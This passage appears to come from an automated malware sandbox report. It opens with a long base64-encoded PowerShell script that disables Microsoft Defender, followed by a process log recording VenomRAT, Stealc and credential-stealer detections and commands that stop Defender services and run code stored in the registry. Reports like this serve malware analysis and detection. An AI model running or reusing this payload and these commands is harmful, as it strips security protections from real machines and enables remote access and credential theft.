AUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
Imagebase:	0x4a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:11:26
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:11:27
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ClientAny.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\ClientAny.exe"
Imagebase:	0x900000
File size:	73'216 bytes
MD5 hash:	958CFC3E7730A66A05D6B8A49CE13D63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000016.00000000.2943358475.0000000000902000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe, Author: ditekSHen
Antivirus matches:	Detection: 84%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	05:11:28
Start date:	10/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7160 -s 996
Imagebase:	0x7ff6b7260000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	05:11:28
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:11:29
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:11:30
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe"
Imagebase:	0x750000
File size:	1'780'224 bytes
MD5 hash:	319888DF2E3F79F5DD0A3CDBFCCDDC03
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.3084330655.0000000000751000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000003.2993639198.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.3089860517.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 45%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:11:30
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:11:30
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:11:30
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x3b0000
File size:	58'880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:11:31
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:11:31
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:11:31
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x3b0000
File size:	58'880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:11:32
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net1.exe" start TrustedInstaller
Imagebase:	0xde0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:11:32
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net1.exe" start TrustedInstaller
Imagebase:	0xde0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:11:33
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net1.exe" start lsass
Imagebase:	0xde0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:11:33
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net1.exe" start lsass
Imagebase:	0xde0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	05:11:34
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Imagebase:	0x4a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	05:11:34
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	05:11:34
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Imagebase:	0x4a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	05:11:34
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	05:11:36
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	05:11:36
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe"
Imagebase:	0x900000
File size:	1'839'104 bytes
MD5 hash:	28CD41E552164EFDF6EAF4C5F00B7821
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3299078255.000000000073C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000003.3140498967.000000000074C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x3b0000
File size:	58'880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\whoami.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x3b0000
File size:	58'880 bytes
MD5 hash:	801D9A1C1108360B84E60A457D5A773A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	05:11:37
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe"
Imagebase:	0xcd0000
File size:	968'192 bytes
MD5 hash:	965DF7E678A228FEA2B2966AD816C837
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	05:11:39
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\net1.exe" stop windefend
Imagebase:	0xde0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	05:11:39
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	05:11:40
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\net1.exe
